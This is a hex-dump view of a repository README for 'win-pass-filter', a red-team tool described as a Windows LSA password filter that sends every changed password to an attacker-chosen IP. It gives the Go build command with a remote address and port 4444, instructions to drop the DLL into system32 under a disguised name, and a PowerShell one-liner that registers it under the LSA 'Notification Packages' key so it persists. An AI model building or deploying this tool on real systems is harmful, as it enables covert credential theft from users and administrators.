Windows Password Filter

⌈⌋ ⎇ branch:  win-pass-filter


Hex Artifact Content

Download

Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

  • File README.md — part of check-in [f2dea56b19] at 2019-06-07 00:51:53 on branch trunk — Initial Commit (user: brimstone size: 918) 
0000: 77 69 6e 2d 70 61 73 73 2d 66 69 6c 74 65 72 0a  win-pass-filter.
0010: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a  ===============.
0020: 0a 5f 73 74 6f 6c 65 6e 20 66 72 6f 6d 20 68 74  ._stolen from ht
0030: 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d  tps://github.com
0040: 2f 69 44 69 67 69 74 61 6c 46 6c 61 6d 65 2f 72  /iDigitalFlame/r
0050: 65 64 74 65 61 6d 2d 74 6f 6f 6c 73 5f 0a 0a 54  edteam-tools_..T
0060: 68 69 73 20 69 73 20 61 20 77 69 6e 64 6f 77 73  his is a windows
0070: 20 4c 53 41 20 70 61 73 73 77 6f 72 64 20 66 69   LSA password fi
0080: 6c 74 65 72 20 74 68 61 74 20 73 65 6e 64 73 20  lter that sends 
0090: 74 68 65 20 6e 65 77 20 70 61 73 73 77 6f 72 64  the new password
00a0: 20 74 6f 20 61 6e 20 49 50 20 6f 66 0a 79 6f 75   to an IP of.you
00b0: 72 20 63 68 6f 6f 73 69 6e 67 2e 0a 0a 42 75 69  r choosing...Bui
00c0: 6c 64 0a 2d 2d 2d 2d 2d 0a 0a 53 69 6d 70 6c 79  ld.-----..Simply
00d0: 20 62 75 69 6c 64 20 66 6f 72 20 77 69 6e 64 6f   build for windo
00e0: 77 73 20 77 69 74 68 20 43 47 4f 20 65 6e 61 62  ws with CGO enab
00f0: 6c 65 64 20 61 6e 64 20 74 68 65 20 61 70 70 72  led and the appr
0100: 6f 70 72 69 61 74 65 20 72 65 63 65 69 76 65 72  opriate receiver
0110: 20 6c 69 73 74 69 6e 67 0a 70 6f 72 74 2e 0a 60   listing.port..`
0120: 60 60 0a 47 4f 4f 53 3d 77 69 6e 64 6f 77 73 20  ``.GOOS=windows 
0130: 43 47 4f 5f 45 4e 41 42 4c 45 44 3d 31 20 67 6f  CGO_ENABLED=1 go
0140: 20 62 75 69 6c 64 20 2d 76 20 2d 78 20 2d 6f 20   build -v -x -o 
0150: 66 69 6c 74 65 72 2e 64 6c 6c 20 2d 62 75 69 6c  filter.dll -buil
0160: 64 6d 6f 64 65 3d 63 2d 73 68 61 72 65 64 20 2d  dmode=c-shared -
0170: 6c 64 66 6c 61 67 73 20 27 6d 61 69 6e 2e 72 65  ldflags 'main.re
0180: 6d 6f 74 65 3d 31 39 32 2e 31 36 38 2e 30 2e 31  mote=192.168.0.1
0190: 30 30 3a 34 34 34 34 27 0a 60 60 60 0a 0a 0a 49  00:4444'.```...I
01a0: 6e 73 74 61 6c 6c 0a 2d 2d 2d 2d 2d 2d 2d 0a 0a  nstall.-------..
01b0: 43 6f 70 79 20 74 68 65 20 60 66 69 6c 74 65 72  Copy the `filter
01c0: 2e 64 6c 6c 60 20 74 6f 20 73 6f 6d 65 77 68 65  .dll` to somewhe
01d0: 72 65 20 6c 69 6b 65 20 60 63 3a 5c 77 69 6e 64  re like `c:\wind
01e0: 6f 77 73 5c 73 79 73 74 65 6d 33 32 5c 69 64 6b  ows\system32\idk
01f0: 2e 64 6c 6c 60 20 61 6e 64 0a 69 6e 73 74 61 6c  .dll` and.instal
0200: 6c 20 77 69 74 68 20 70 6f 77 65 72 73 68 65 6c  l with powershel
0210: 6c 0a 60 60 60 0a 70 6f 77 65 72 73 68 65 6c 6c  l.```.powershell
0220: 20 2d 63 6f 6d 20 22 24 61 3d 27 69 64 6b 27 3b   -com "$a='idk';
0230: 24 62 3d 28 47 65 74 2d 49 74 65 6d 50 72 6f 70  $b=(Get-ItemProp
0240: 65 72 74 79 20 27 48 4b 4c 4d 3a 5c 53 79 73 74  erty 'HKLM:\Syst
0250: 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f  em\CurrentContro
0260: 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4c 73 61  lSet\Control\Lsa
0270: 27 20 2d 4e 61 6d 65 20 27 4e 6f 74 69 66 69 63  ' -Name 'Notific
0280: 61 74 69 6f 6e 20 50 61 63 6b 61 67 65 73 27 29  ation Packages')
0290: 2e 27 4e 6f 74 69 66 69 63 61 74 69 6f 6e 20 50  .'Notification P
02a0: 61 63 6b 61 67 65 73 27 3b 20 53 65 74 2d 49 74  ackages'; Set-It
02b0: 65 6d 50 72 6f 70 65 72 74 79 20 27 48 4b 4c 4d  emProperty 'HKLM
02c0: 3a 5c 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74  :\System\Current
02d0: 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72  ControlSet\Contr
02e0: 6f 6c 5c 4c 73 61 27 20 2d 4e 61 6d 65 20 27 4e  ol\Lsa' -Name 'N
02f0: 6f 74 69 66 69 63 61 74 69 6f 6e 20 50 61 63 6b  otification Pack
0300: 61 67 65 73 27 20 2d 56 61 6c 75 65 20 22 22 24  ages' -Value ""$
0310: 62 60 72 60 6e 24 61 22 22 22 0a 60 60 60 0a 0a  b`r`n$a""".```..
0320: 49 66 20 79 6f 75 20 63 68 61 6e 67 65 20 74 68  If you change th
0330: 65 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 64 6c  e name of the dl
0340: 6c 20 69 6e 20 60 63 3a 5c 77 69 6e 64 6f 77 73  l in `c:\windows
0350: 5c 73 79 73 74 65 6d 33 32 60 20 74 68 65 6e 20  \system32` then 
0360: 61 6c 73 6f 20 75 70 64 61 74 65 20 74 68 65 0a  also update the.
0370: 60 24 61 60 20 76 61 72 69 61 62 6c 65 2e 0a 0a  `$a` variable...
0380: 52 65 62 6f 6f 74 20 77 68 65 6e 20 66 69 6e 69  Reboot when fini
0390: 73 68 65 64 2e 0a                                shed..